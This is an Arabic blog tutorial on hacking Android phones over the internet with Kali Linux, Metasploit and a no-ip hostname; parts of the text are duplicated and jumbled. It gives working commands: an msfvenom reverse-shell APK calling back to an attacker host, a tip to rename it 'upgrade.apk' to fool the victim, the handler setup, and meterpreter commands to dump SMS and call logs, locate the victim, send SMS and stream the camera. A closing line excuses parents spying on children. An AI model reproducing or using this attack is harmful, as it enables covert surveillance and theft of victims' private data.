اختراق هواتف الاندرويد خارج الشبكة و الابقاء على الاتصال باستعمال الكالي لينكس
شارك مع اصدقائك:
هذا المقال قد تم اغلاقه ...
نظرا لقلة الدعم الذي يقدمه المستخدم العربي فقد راينا الكثير من المدونات والمنتديات قد اغلقت ... وذلك لعدة اسباب اخرى منطقية نذكر منها :
نظرا لقلة الدعم الذي يقدمه المستخدم العربي فقد راينا الكثير من المدونات والمنتديات قد اغلقت ... وذلك لعدة اسباب اخرى منطقية نذكر منها :
- المواضيع التافهة التي يبحث عنها المستخدم العربي
- عقلية المستخدم العربي في النقد الهدام
- توجهات المستخدم العربي الفارغة
- غياب معنى المصادر المفتوحة والمجتمع المعطي بدون مقابل في العالم العربي
هناك العديد من الطرق لاختراق الهاتف الذكي الذي يعمل بنظام أندرويد باستخدام الكالي لينكس، لكن كل هذه الحيل تعمل فقط على الشبكة المحلية يعني تنجح فقط مع الهواتف المتصلة بشبكتك.
و اليوم سنتطرق الى كيفية اختراق هاتف الاندرويد خارج الشبكة بدون فقد الاتصال باستخدام الكالي لينكس.
سنستعمل "Public IP" الخاص بك و الذي سيكون من الغباء اختراق جهاز باستعمال هذا الاي بي مباشرة و المخترقين الاخرون يستعملون طرف ثالث بين جهاز الضحية و الاي بي العام الخاص بهم للابقاء على الاتصال و تغطية الاثر نوعا ما لانك حتى باستعمال public ip فان هذا الاخير يتغير بعد اعادة اتصالتك بالانترنتت.
الذي تحتاجه للبدا معنا في تطبيق الخطوات التالية ستحتاج الى الراوتر يدعم اعادة توجة المنافذ و نظام الكالي لينكس و الـ Metasploit و خدمة no-ip و يجب ان يكون لديك اتصال مع هاتف الضحية.
الفكرة ستكون بانشاء "Payload" خاص بالاندرويد و ارساله الى الضحية و لهذا كما قلت فمن المفروض ان يكون لديك اتصال مع الضحية.
و لهذا نستعمل خدمة no-ip و اليك ما تفعله هذه الخدمة تجعل عنوان IP الديناميكي (المتغير) الخاص بك يتصرف كما لو كان ثابتًا باختصار (Static).
اذا ظهرت عندك معلومات كثيرة فذلك يعني انه يتم ارسال و استقبال الحزم من و الى المضيف و الذي يعني انه متصل، لايقاف العملية من الكيبورد اضغط على "CTRL + C"
#1 تقوم بالدخول الى اعدادات الراوتر الخاص بك بادخال اي بي الراوتر في المتصفح و في الغالب سيكون بهذا الشكل 192.168.1.1 لكن اذ لم يكن كذلك فعليك بمعرفة اي بي الراوتر اولا و اليك الطريقة.
#2 تبحث في الاعدادات عن "Port Range Forwarding" او "Routing" او "Virtual Server" او شيء من هذا القبيل.
#3 بعد ان تجدها تضيف "اعاددة توجيه جديدة" "New Route".
#4 الان تذهب مباشرة الى الكالي لينكس و تفتح التارمنال و تكتب الامر التالي لمعرفة الاي بي الخاص بالكالي.
في الغالب ستجده يبدا بـ"192" كما موضح في الصورة ثم تقوم بنسخه.
#5 و ترجع الى صفحة الراوتر و كما قلنا تضيف اعادة توجيه جديدة و تدخل المعلومات المهمة التالية:
لاحظ اننا اضفنا الهوست fhack98.hopto.org - الذي انشاناه في الخطوات الاولي - من موقع no-ip فاذا تخطيت الخطوات الاولى و لم تنشا حساب no-ip فيمكنك استعمال اي بي العام الخاص بك مادمت تقوم بتجريب فقط.
غير hacking.apk الى اسم غير مشكوك في امره مثل upgrade.apk حتى لا ينتبه اليه الضحية.
#2 تنتظر للحظات و سيتم انشاء تطبيق اندرويد في سطح المكتب عندك.
#3 بعدما ترسل التطبيق الذي انشاناه في الخطوة (1) الى الضحية، تذهب و تفتح الطرفية مرة اخرى و تشغل msfconsole بادخال الامر التالي:
#4 انتظر قليلا، ثم ادخل الامر التالي:
#5 ثم تدخل كل امر على حدة من الاوامر التالية:
* غير fhack98.hopto.org باسم المضيف الذي حصلت عليه من no-ip في الخطوات اولى.
* غير 192.168.58.129 بالاي بي الخاص بالكالي لينكس (الخطوة 4 من فتح بورت خاص على الراوتر)
* اما رقم البورت 4040 يجب ان تكون بنفس بورت البيلود التي انشاناه في الخطوات الاولى و نفسه الذي ادخلناه في الراوتر.
#7 ثم تُدخل الامر التالي لبدا التنصت :
ما ان يقوم الضحية بتثبيت التطبيق سيظهر عندك "meterpreter" و الذي يعني انك نجحت في اختراق هاتف اندرويد الضحية و اصبح بامكانك التحكم الكامل في الهاتف.
* لمعرفة ما اذا كان الهاتف يعمل بالروت ام لا ادخل الامر التالي: check_root
* لمعرفة مكان تواجد الضحية بالضبط ادخل الامر التالي: wlan_geolocate
* لتحميل سجل مكالمات ادخل الامر التالي: dump_calllog
* لتحميل الرسائل ادخل الامر التالي: dump_sms
سيتم تحميلها على شكل ملف نصي و ستجده في مجلد "root".
* لارسال رسالة sms من هاتف الضحية الى شخص اخر ادخل الامر التالي مع تغيير ما يجب تغييره:
غير 0123456 برقم هاتف الشخص الذي تريد ان ترسل له sms من هاتف الضحية.
غير Hello بالرسالة التي تريد ان ترسلها.
* لبث فيديو مباشر من كامير هاتف الضحية ادخل الامر التالي:
سيفتح عندك المتصفح تلقائيًا وسترى البث المباشر من الكاميرا الخاصة به.
و اليوم سنتطرق الى كيفية اختراق هاتف الاندرويد خارج الشبكة بدون فقد الاتصال باستخدام الكالي لينكس.
ان هذا المحتوى هدفه تعليمي فقط.
بهذه الطريقة يمكنك اختراق اي هاتف ذكي يعمل بنظام الاندرويد متصل بالانترنت و في اي مكان كان.سنستعمل "Public IP" الخاص بك و الذي سيكون من الغباء اختراق جهاز باستعمال هذا الاي بي مباشرة و المخترقين الاخرون يستعملون طرف ثالث بين جهاز الضحية و الاي بي العام الخاص بهم للابقاء على الاتصال و تغطية الاثر نوعا ما لانك حتى باستعمال public ip فان هذا الاخير يتغير بعد اعادة اتصالتك بالانترنتت.
الذي تحتاجه للبدا معنا في تطبيق الخطوات التالية ستحتاج الى الراوتر يدعم اعادة توجة المنافذ و نظام الكالي لينكس و الـ Metasploit و خدمة no-ip و يجب ان يكون لديك اتصال مع هاتف الضحية.
الفكرة ستكون بانشاء "Payload" خاص بالاندرويد و ارساله الى الضحية و لهذا كما قلت فمن المفروض ان يكون لديك اتصال مع الضحية.
انشاء اسم مضيف جديد باستعمال خدمة no-ip
لماذا يجب ان نستعمل no-ip
من المعلوم ان الاي بي العام يتغير في كل مرة تطفئ فيها جهازك او تعيد الاتصال بالانترنت الى اي بي اخر تماما الذي يفرض علينا الا نستعمله كنقطة اتصال بين هاتف الضحية و لينكس الخاص بنا لانه ما ان نعيد الاتصال بالانترنت فاننا سنفقد الاتصال بالضحية.و لهذا نستعمل خدمة no-ip و اليك ما تفعله هذه الخدمة تجعل عنوان IP الديناميكي (المتغير) الخاص بك يتصرف كما لو كان ثابتًا باختصار (Static).
تسجيل بموقع no-ip
- تقوم اولا بالدخول الى موقع no-ip من هنا.
- تضغط على "Sign up" لتسجيل حساب جديد بالموقع
- تدخل المعلومات المناسبة الايميل و الباسورد و في الـ "Host name" تُدخل اي اسم من عندك تستطيع تذكره
- و تنزل مباشرة نحو الاسفل و تضغط على "Free Sign up"
انشاء مضيف
- بعد تفعيل حسابك، تقوم بتسجيل الدخول اليه.
- ستظهر لك صفحة جديد تضغط مباشرة على زر "Add hostname" ثم تعبئ المعلومات.
- في الـ "Hostname" تُدخل اي اسم تتذكره جيدا و في "Domain" تختار "hopto.org"
- اذا لم يكن باستطاعتك انشاء هوست جديد و هذا بعد تحديثات الموقع تذهب من القوائم الجانبية الى "Dynamic DNS" و ستجد ان الموقع قد انشا Hostname جديد من قبل و كما ينبغي، اما اذا كنت تريد انشاء المزيد من "Hostname" فيجب ان تشتري الحساب المدفوع.
الاتصال بالمضيف
#1 ترجع الى صفحة الموقع من جديد و من الاعلى تضغط على "Download" او تدخل الى صفحة التحميل من هنا مباشرة.
#2 ستجد زر "Download Now" ضخم تضغط عليه و سيبدا تحميل الحزمة التي نريدها، مكان الحفظ افتراضيا سيكون مجلد "Downloads"
#3 تفتح التارمنال و تدخل الامر التالي للانتقال الى مجلد التحميل "Downloads".
#2 ستجد زر "Download Now" ضخم تضغط عليه و سيبدا تحميل الحزمة التي نريدها، مكان الحفظ افتراضيا سيكون مجلد "Downloads"
#3 تفتح التارمنال و تدخل الامر التالي للانتقال الى مجلد التحميل "Downloads".
cd Downloads
#4 تُدخل الامر التالي لفك الضغط عن الحزمة المحملة.
tar xf noip-duc-linux.tar.gz
5# تدخل الامرين التالين للدخول الى مجلد "no-ip" و تثبيت خدمة "no-ip"
cd noip-2.1.9-1/
make install
غير"noip-2.1.9-1" الى اسم المجلد الذي ظهر عندك، انتظر قليلا ليطلب منك ادخال الايميل تقوم بادخاله و من الكيبورد تضغط على مفتاح الدخول و سيطلب منك ادخال الباسورد تقوم بادخالها و تضغط "Enter" ثم تُدخل رقم "5" و تضغط مفتاح الدخول مرة اخرى و اخير تدخل "n" و تضغط "Enter" اخيرا.
#6 التحقق من ان المضيف متصل بالانترنت، لفعل ذلك تُدخل الامر التالي.
ping fhack98.hopto.org
تغير "fhack98.hopto.org" باسم المضيف الذي حصلت عليه من موقع "no-ip".
اذا ظهرت عندك معلومات كثيرة فذلك يعني انه يتم ارسال و استقبال الحزم من و الى المضيف و الذي يعني انه متصل، لايقاف العملية من الكيبورد اضغط على "CTRL + C"
اختراق اي هاتف اندرويد باستخدام الكالي لينكس
فتح بورت خاص على الراوتر
عندما نرسل للضحية الحمولة (Payload) و يقوم بتثبيته و فتحه فان هذا Payload سيرسل لنا من جهاز الضحية طلب اتصال الى اي بي العام الخاص بك (اما باستعمالنا no-ip فانه يتم محاولة الاتصال بالمضيف الذي انشاءناه و هو بدوره يقوم بالاتصال بالاي بي الخاص بنا) سيتلقى الراوتر الاتصال و بعملنا لاعداة توجيه الاتصال سيعرف الراوتر لمن هذا الاتصال هل للويندوز او اللينكس او الهاتف بمعنى اننا سنحدد له اي جهازعلى شبكتنا و اي نظام تابع له هذا الاتصال مفهوم!!#1 تقوم بالدخول الى اعدادات الراوتر الخاص بك بادخال اي بي الراوتر في المتصفح و في الغالب سيكون بهذا الشكل 192.168.1.1 لكن اذ لم يكن كذلك فعليك بمعرفة اي بي الراوتر اولا و اليك الطريقة.
#2 تبحث في الاعدادات عن "Port Range Forwarding" او "Routing" او "Virtual Server" او شيء من هذا القبيل.
#3 بعد ان تجدها تضيف "اعاددة توجيه جديدة" "New Route".
#4 الان تذهب مباشرة الى الكالي لينكس و تفتح التارمنال و تكتب الامر التالي لمعرفة الاي بي الخاص بالكالي.
ifconfig
في الغالب ستجده يبدا بـ"192" كما موضح في الصورة ثم تقوم بنسخه.
#5 و ترجع الى صفحة الراوتر و كما قلنا تضيف اعادة توجيه جديدة و تدخل المعلومات المهمة التالية:
- البروتوكول "tcp"
- "Destination IP" او "Local IP" تُدخل فيها الاي بي الذي نسخناه في الخطوة (4)
- و في منفذ البداية "Start Port" تدخل الرقم "4040" و كذلك بالنسبة لمنفذ النهاية "End Port" يمكن ان تغير هذا الرقم الى اي شيء اخر غير المنافذ الاساسية في حاسوبك كـ "80" و غيرها من المنافذ المعروفة.
- و في الاخير تضغط على "Add" او "Save" .
انشاء تطبيق اختراق اندرويد - Payload
الحمولة (Payload) التي سننشاها الان هي تطبيق اندرويد نرسله الى جهاز الضحية ليقوم بتثبيته و عندما يقوم بذلك سيتيح لنا الاتصال بجهاز اندرويد الضحية و التحكم به.
سنستعمل اداة Metasploit لانشاء الحمولة "Payload" و للتنصت و اختراق هاتف الضحية، و في الغالب ستكون متاحة على توزيعة كالي لينكس.
#1 قم بفتح الطرفية "Terminal" و ادخل الامر الاتي لانشاء الحمولة او مايسمى بـ Payload و غير ما يجب تغييره.سنستعمل اداة Metasploit لانشاء الحمولة "Payload" و للتنصت و اختراق هاتف الضحية، و في الغالب ستكون متاحة على توزيعة كالي لينكس.
msfvenom -p android/meterpreter/reverse_tcp LHOST=fhack98.hopto.org LPORT=4040 -o /root/Desktop/hacking.apk
غير hacking.apk الى اسم غير مشكوك في امره مثل upgrade.apk حتى لا ينتبه اليه الضحية.
#2 تنتظر للحظات و سيتم انشاء تطبيق اندرويد في سطح المكتب عندك.
#3 بعدما ترسل التطبيق الذي انشاناه في الخطوة (1) الى الضحية، تذهب و تفتح الطرفية مرة اخرى و تشغل msfconsole بادخال الامر التالي:
msfconsole
use multi/handler
set LHOST fhack98.hopto.org
set LPORT 4040
set ReverseListnerBindAddress 192.168.58.129
set ReverseListnerBindAddress 192.168.58.129
* غير 192.168.58.129 بالاي بي الخاص بالكالي لينكس (الخطوة 4 من فتح بورت خاص على الراوتر)
* اما رقم البورت 4040 يجب ان تكون بنفس بورت البيلود التي انشاناه في الخطوات الاولى و نفسه الذي ادخلناه في الراوتر.
#7 ثم تُدخل الامر التالي لبدا التنصت :
exploit
ما ان يقوم الضحية بتثبيت التطبيق سيظهر عندك "meterpreter" و الذي يعني انك نجحت في اختراق هاتف اندرويد الضحية و اصبح بامكانك التحكم الكامل في الهاتف.
كيفية التحكم في هاتف الضحية
تاليا مجموعة الاوامر التي تساعدك على التحكم في الهاتف عن بعد و القيام ببعض الامور الرائعة كمعرفة رسائل الضحية و سجل الاتصالات و حتى يمكنك ارسال رسائل SMS عبر هاتف الضحية و غيرها.* لمعرفة ما اذا كان الهاتف يعمل بالروت ام لا ادخل الامر التالي: check_root
* لمعرفة مكان تواجد الضحية بالضبط ادخل الامر التالي: wlan_geolocate
* لتحميل سجل مكالمات ادخل الامر التالي: dump_calllog
* لتحميل الرسائل ادخل الامر التالي: dump_sms
سيتم تحميلها على شكل ملف نصي و ستجده في مجلد "root".
* لارسال رسالة sms من هاتف الضحية الى شخص اخر ادخل الامر التالي مع تغيير ما يجب تغييره:
send_sms -d 0123456 -t Hello
غير Hello بالرسالة التي تريد ان ترسلها.
* لالتقاط صورة من كامير الهاتف:
- لاظهار جميع كاميرات الهاتف webcam_list
- ستظهر لك قائمة بالكاميرات تختار واحدة تريد التصوير منها webcam_snap 2
* لبث فيديو مباشر من كامير هاتف الضحية ادخل الامر التالي:
webcam_stream
اما الان فدعني اوضح لك عزيزي القارئ ان هدفي من نشر هذه المقالة المعنونة بهذا العنوان هو اولا اثراء المحتوى العربي ثانيا تثقيف القارئ العربي ثالثا التنبيه الى هذه الطرق في الاختراق لتتفاداها مستقبلا و تعلم ان ليس كل ملف يرسل لك يمكنك تحميله، و ليست هذه الطرق للـ Black Hat او كما يسمون اصحاب القبعات السوداء فالاباء مثلا يمكن ان يستعملوا هذه الطرق على هواتف اولاده اذا كانوا يريدوا ان يكونوا اقرب منهم 😋 و انت و نواياك.
ليست هناك تعليقات